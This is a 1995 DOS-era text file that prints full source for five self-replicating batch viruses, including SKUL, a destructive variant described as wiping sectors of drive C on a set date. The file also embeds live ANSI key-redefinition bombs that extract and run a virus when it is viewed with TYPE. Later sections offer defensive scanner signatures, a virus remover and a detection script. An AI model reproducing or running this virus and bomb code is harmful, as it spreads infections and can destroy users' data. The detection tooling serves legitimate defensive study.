--------------------------------- Batch File Viruses and ANSI Bombs --------------------------------- This file has no copyright (C) 1995 - use it, steal it, say you wrote it yourself, I don't care. This file might not even have an author. I don't want fame. I just want people to be aware of this stuff. As long as you don't try to cut out and run the programs and view this file with a text viewer, this file is totally harmless. But... This file contains ANSI and non-printable characters INCLUDING strings that can redefine keys on the keyboard! DO NOT TYPE THIS DOCUMENT unless you know what you are doing! Use EDIT or LIST (or almost any text viewer) to read this document. The batch files presented (and one especially) can be VERY DANGEROUS under certain circumstances!!! DO NOT CUT OUT AND RUN SKUL unless you make damn sure it's been deactivated! It's supposed to be but don't count on it. It's not my intention to format someone's drive, only to demonstrate how trivial it is to do. I don't know if it even works. It probably does, so DON'T PLAY WITH IT. There is no recovery other than re-formatting if it 'goes off'. It can't unless you deliberately cut it out and save it to a batch file then run it. Even if someone modified this document to 'bomb load' it you'd still have to TYPE this file to load the bomb. Again, ALWAYS use a viewer. Perhaps the possibility of this happening will break people of the TYPE habbit. I will not accept any responsibility for anything contained in this file. What you do with this information is your business but I'd prefer you'd use it to protect and educate yourself and not to hurt someone. You, the reader of this document, assume ALL responibility for whatever you do with the information. As with all things in life. If you are TYPE'ing this file (or using MORE) the following keys will be affected if ANSI.SYS is running and unprotected... * The uppercase Z key will extract the ZEP batch virus (very tame) and execute it, provided this file is named BATV.TXT and in the current directory. This virus can infect one batch in the current or parent directory with each run. Make sure you track any infections carefully! * The BackSpace key will flash Hey! each time it's pressed but will otherwise still work. * The <`> key will first be defined to 'XoP_B XoP_' then redefined in the next section to write out a short batch file and run it. The batch will then display Working... while it does a directory while 'CTTY NUL' is in effect to simulate lots of disk noise. Then it restores the console and deletes itself producing a BATCH FILE MISSING error. If you abort by Ctrl-Break the computer will probably lock up. None of these actions should affect any data except for batch files. Before attempting to demonstrate any of these effects read through this file with a text viewer completely! If you are using any kind of DOS command to view this file, and these are not the effects you wish to demonstrate EXIT NOW! (Ctrl-Break) ------------------------------------------------------------------------ Batch Viruses ------------- It is generally assumed in the virus community that batch files are not viable targets for viral infections. However my own experiments seem to disprove this notion. It is true that existing samples (at least what I've seen) are not so hot, but do not assume it can't be done. It just takes a little batch know-how. Presented here are five batch viruses that actually work. On modern systems they are practically invisible unless they activate. To people that pay attention to their files these are not much of a threat, but we're often so busy protecting the exe's something like this can go unnoticed. Removal is easy - use any editor to remove it from all affected batches then delete the hidden root file if present (you have to remove the hidden attribute). Common traits... - They infect only un-infected batch files (no re-infection of same type). - No effect the host file's functionality. Files still work normally. - Virus gets control AFTER host batch completes (or hits last line). - They travel using the .. method as well as attacking the current directory - Exist indepenent of any other files. Totally parasitic. - DOS 5 or better may be 'required', I'm not sure. ZEP (165) - The smallest so far! Except for GeeZ. XOP (361) - Infects two batches per run. POT (685) - Infects one batch per run. If it can't infect anything it drops two ANSI bombs (space bar flashes a message and the ` key runs the root copy of the virus) and checks for '00' anywhere in the current time. If so it displays a silly message, giving itself away. SKUL (497) - This is a DANGEROUS file!!! It will overwrite over 8000 sectors of drive C on the 20th of any month!!! DO NOT RUN! I do not normally write destructive code but did in this case so folks might take this more seriously. Hides itself from TYPE but does not define any keys. ZOP_B (615) - Infects two files per run. If infected batch files are TYPE'd the ` key will be redefined to run itself. The key is undefined after the virus runs. You won't see much when you TYPE it. The ANSI tricks work only if ANSI.SYS is loaded. All of these work on the same basic principle: Use a key-string specific to the virus on EVERY line. The FIND command is used to extract the viral code out of the host for eventual copy to the victom files, and also to check for previous infection. All of these except ZEP keep a hidden copy of themselves in the root of drive C: to permit operation even if the infected batch being run is not in the current directory. If the copy is not present they will create it when run from the current directory. ZEP will infect only if the infected batch is run from the current directory. Two methods are used to find files. The first, used by XOP, POT and ZOP_B, loops for every batch file found by calling the root copy. The second method merely checks the LAST batch found and avoids the looping. While much faster, it will only infect one file unless files are moved around making it a 'slow infector'. To give credit where credit is due, this idea (one for.. do set... line) sort-of comes from an example in Vir-101. The first method is of my own devising and behaves closer to the real thing but would be obvious if run without a cache or in a directory containing many batch files. Even if it infects only one or two at a time it still has to loop for all of them since batch doesn't provide an easy way to terminate a loop. Even so, it's pretty fast most of the time - less than a second. The 101 way, although limited, is faster because the loop calls no code. --ZEP.BAT------------------------------------------------------------------ @echo off%[ZeP]% if not exist %0.bat goto ZeP for %%f in (*.bat ..\*.bat) do set ZeP=%%f find /i "ZeP"<%ZeP%>nul if errorlevel 1 find "ZeP"<%0.bat>>%ZeP% :ZeP --XOP.BAT------------------------------------------------------------------ @echo off%[XoP]% if '%XoP%=='11 goto XoP2 if '%2=='_ goto XoP1 if exist C:\XoP.bat goto XoP if not exist %0.bat goto XoP2 find "XoP"<%0.bat>C:\XoP.bat attrib C:\XoP.bat +h :XoP for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _ set XoP= goto XoP2 :XoP1 find /i "XoP"<%1>nul if not errorlevel 1 goto XoP2 type C:\XoP.bat>>%1 set XoP=%XoP%1 :XoP2 --POT.BAT------------------------------------------------------------------ @echo off%_PoT% if '%PoT%=='I goto PoTz if '%1=='_ goto PoTi if exist C:\PoT.bat goto PoT if not exist %0.bat goto PoTz find "PoT"<%0.bat>C:\PoT.bat attrib C:\PoT.bat +h :PoT Makes You Feel Goodz for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f if '%PoT%=='I goto PoTf set PoT= echo %PoT%[32;"You're Stoned!       "p echo %PoT%[96;"C:\PoT";13p%PoT%[2A echo.%_PoT%|time|find "00">nul if errorlevel 1 goto PoTf echo %PoT%[1A%PoT%[s%PoT%[1;37;44m echo %PoT%[3;9H Let me outta here! %PoT%[0m%PoT%[u :PoTf gold set PoT= goto PoTz :PoTi nfect find /i "PoT"<%2>nul if not errorlevel 1 goto PoTz type C:\PoT.bat>>%2 set PoT=I :PoTz --SKUL--------------------------------------------------------------------- ::SKuL @echo off%[SKuL]% echo.|date|find "20">nul%[SKuL]% if errorlevel 1 goto SKuL1 echo SKuL Killing Hardfile... ::echo °¹ ™Í&Í>SKuL.com ::SKuL :SKuL1  if exist C:\SKuL goto SKuL2 if not exist %0.bat goto SKuL find "SKuL"<%0.bat>C:\SKuL attrib C:\SKuL +h :SKuL2  set SKuL=C:\AUTOEXEC.BAT for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f if not exist %SKuL% goto SKuL find /i "SKuL"<%SKuL%>nul if errorlevel 1 type C:\SKuL>>%SKuL% set SKuL= :SKuL  --ZOP_B.BAT---------------------------------------------------------------- @echo off :: --- [ZoP_B] Batch Infector --- if '%2=='ZoP_ goto ZoP_1 if '%1=='ZoP_ echo ["`";"`"p ::["`";"ZoP_B ZoP_";13p ::ZoP_ if exist c:\ZoP_B.bat goto ZoP_ if not exist %0.bat goto ZoP_2 echo @echo Off>c:\ZoP_B.bat find "ZoP_"<%0.bat>>c:\ZoP_B.bat attrib c:\ZoP_B.bat +h ::ZoP_ :ZoP_ for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_ if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_ set ZoP_= goto ZoP_2 ::ZoP_ :ZoP_1 if '%ZoP_%=='11 goto ZoP_2 find "ZoP_"<%1>nul if not errorlevel 1 goto ZoP_2 type c:\ZoP_B.bat>>%1 set ZoP_=%ZoP_%1 :ZoP_2 ::ZoP_ -------------------------------------------------------------------------- ANSI Bombs ---------- The title says Batch Viruses and ANSI bombs, so here's the ANSI section. Some of the above files contain ANSI bombs but they are not harmful. ANSI bombs can be very harmful if you are not aware of them. As long as you either do not run ANSI.SYS or if you do, fortify it with TBDRIVER or something, or never use the TYPE command to look at files, and always view batch files before you run them, you're OK. For starters, just don't use the TYPE and MORE commands when dealing with new files, and CHECK THOSE BAT FILES WITH EDIT before you run them. Since someone could accidently TYPE this document, none of these examples will do anything really harmful but hopefully will get the point across. And the first one (I'm going to write this right now...) will extract the ZEP batch virus from this file, assumed to be named BATV.TXT. The bomb will be placed on the uppercase Z key. This is not a practical example, a real bomb would do the return key or something more likely to be pressed, and a real bomb would probably just go ahead and wipe your drive out. ------------------------------------------------------------- ::["Z";"find ";34;"ZeP";34;"ZEP.BAT";13;"ZEP";13p ------------------------------------------------------------- It will also copy the above line but I guess that's OK. It just becomes part of the ZEP virus. The bomb won't work unless BATV.TXT is present. This is boring. Sure, ANSI bombs can format your hard disk, but they are limited as far as brains go. For example, it is impossible to write a self contained ANSI bomb that plants the ZEP virus because you can't redirect lines already containing redirection into a file. A couple more then I quit. --HEYBUG-(BACKSPACE KEY)---------------------- [8;"Hey!               "p ---------------------------------------------- --SCARE--(` KEY)-----------  [96;"echo @echo off>~.bat echo cls>>~.bat echo echo Working...>>~.bat echo ctty nul>>~.bat echo dir \ /s>>~.bat echo ctty con>>~.bat echo del ~.bat>>~.bat ~ "p --------------------------- Scan Strings ------------ Scanning for ANSI bombs and batch viruses can be somewhat tricky but is possible if the scanner supports wildcard signatures. The batch viruses and ANSI bombs presented here can be detected by the following HTSCAN signature strings. ThunderByte's scanner also supports wildcards but you'd probably have to convert them. ;-----HTSCAN Signatures------------------------- ; ; *** ANSI key codes *** ; F Quoted Key Redefinition BAT COM EXE 1B5B%73B%722%(250)22%770 F Entered Key Redefinition BAT COM EXE 1B5B%F3B**3B313370 ; ; *** Batch crap detectors *** ; I BAT virus? (finds itself) BAT 66//4669//496E//4E64//44%222%F22%23C%22530 I BAT virus? (BAT loop) BAT 28%32A2E62//4261//4174//44%129%22064//446F//4F20 F Debugs file (could be danger) BAT 0D0A64//4465//4562//4275//5567//47%23C T Disk C: Killer! (int 26) COM EXE SYS BAT B002%FCD26 Batch Virus Remover ------------------- This file will clean batch viruses of the type described in this document. Basically, it removes all lines containing a specific string provided the file also contains another specific string. Needless to say, if called with the wrong string it will reduce your batches to mush, so be careful if you have to use it (like if one of these toys gets away). As written DOS 6 (or at least CHOICE.COM) is required because it confirms each file before cleaning it. So you don't clean your original sample. To use, determine the key string for the batch virus (the string present on every line). For example say I have a bat virus that contains 'GeeZ' in every line (here I go again) like in the following... :: :: host file :: ctty nul%_GeeZ% for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a find "GeeZ"<%GeeZ% if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ% ctty con%_GeeZ% To remove it, enter CLEANBAT GeeZ then answer the prompts. -------------- CLEANBAT.BAT ------------------------------- @echo off if '%1=='%temp% goto remove if exist C:\DOS\CHOICE.COM goto start echo This batch requires CHOICE.COM in C:\DOS! :start echo **** Batch Virus Remover **** echo. echo Warning! If key is not unique this will destroy files! echo Usage: CLEANBAT Key1 [Key2] where Key1 is the UNIQUE echo signature used by the virus and Key2 is an identifying echo string. If not specified then Key2 is set to Key1 echo. set ks=%1 set is=%2 if '%ks%==' goto exit if '%is%==' set is=%ks% if '%temp%==' set temp=C:\ echo Will remove %ks% from files containing %is%. Proceed? choice /c:yn>nul if errorlevel 2 goto exit for %%v in (*.bat) do call %0 %temp% %%v if exist rem$$_ del rem$$_ goto exit :remove find "%is%"<%2>nul if errorlevel 1 goto done echo Found in %2 - remove? choice /c:yn>nul if errorlevel 2 goto done find /v "%ks%"<%2>rem$$_ copy rem$$_ %2>nul goto done :exit set is= set ks= :done ----------------------------------------------------------- ANSI / Bad Command Scanner -------------------------- This is not as accurate as the signatures, and quite a bit slower, but not unusably so. Actually it detects much more than the sigs do. What this does is read through every file in the directory listing any dangerous codes or commands it finds for each file. Obviously the flags for batch commands are meaningless unless contained in a batch file, and sometimes batches need to delete a file, so consider the output as an early warning. Despite its simplistic nature it will detect most types of key redefinition that I can think of. NOTE - EscSeq is NOT really a warning, many color batches and all ANSI screens contain this, but if KeyRedef, Key2 or Key3 shows up definitely check out the file. To use, copy this to a directory on the path, then CD to the directory containing the files and enter 'CHKANSI'. To scan just one batch or specific groups of files enter something like 'CHKANSI *.BAT *.ANS'. This needs a fair amout (maybe 120 bytes) of environment to work properly. If you encounter errors enter 'COMMAND /E:512' at the prompt. Consider adding 'SHELL=C:\DOS\COMMAND.COM /E:512 /P' to your CONFIG.SYS if this or a similar line is not present. NOTE - check the set esc= and set tab= lines - these should set a single escape character and tab character repspectively. EDIT will expand the tab character to spaces. All this does is make the listing look better but the esc= line is vital! Make sure there are no spaces after the escape character or it won't work!! If you use EDIT to split this out, redo the set tab= line - delete the spaces (until line pops up-9 times) then press . You have to do this each time you load it into EDIT. If you forget it will still function but the flags will no longer line up evenly. Just a pick. --------------- CHKANSI.BAT ------------------------------- @echo off if '%2=='Loop goto loop echo *** ANSI/BATCH SCANNER *** set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9 if '%mask%==' set mask=*.* for %%f in (%mask%) do call %0 %%f Loop goto done :loop if not exist %1 goto done set line= :: escape and tab characters set esc= set tab= find "%esc%["<%1>nul if not errorlevel 1 set line=%line%EscSeq find /i "$e["<%1>nul if not errorlevel 1 set line=%line%PromptSeq find ";13p"<%1>nul if not errorlevel 1 set line=%line%KeyRedef if '%line%==' goto checkbad find """p"<%1>nul if not errorlevel 1 set line=%line%Key2 set hit=0 find "0p"<%1>nul if not errorlevel 1 set hit=1 find "1p"<%1>nul if not errorlevel 1 set hit=1 find "2p"<%1>nul if not errorlevel 1 set hit=1 find "4p"<%1>nul if not errorlevel 1 set hit=1 find "5p"<%1>nul if not errorlevel 1 set hit=1 find "6p"<%1>nul if not errorlevel 1 set hit=1 find "7p"<%1>nul if not errorlevel 1 set hit=1 find "8p"<%1>nul if not errorlevel 1 set hit=1 find "9p"<%1>nul if not errorlevel 1 set hit=1 if %hit%==1 set line=%line%Key3 :checkbad find /i "DEL "<%1>nul if not errorlevel 1 set line=%line%Del find /i "DELTREE"<%1>nul if not errorlevel 1 set line=%line%Deltree find /i "DEBUG"<%1>nul if not errorlevel 1 set line=%line%Debug find /i "ATTRIB "<%1>nul if not errorlevel 1 set line=%line%Attrib find /i "FORMAT C:"<%1>nul if not errorlevel 1 set line=%line%Format find /i "*.BAT"<%1>nul if not errorlevel 1 set line=%line%BAT find /i "*.EXE"<%1>nul if not errorlevel 1 set line=%line%EXE find /i "*.COM"<%1>nul if not errorlevel 1 set line=%line%COM echo %1 %tab%%line% :done set mask= set line= set hit= set esc= set tab= -----------------------------------------------------------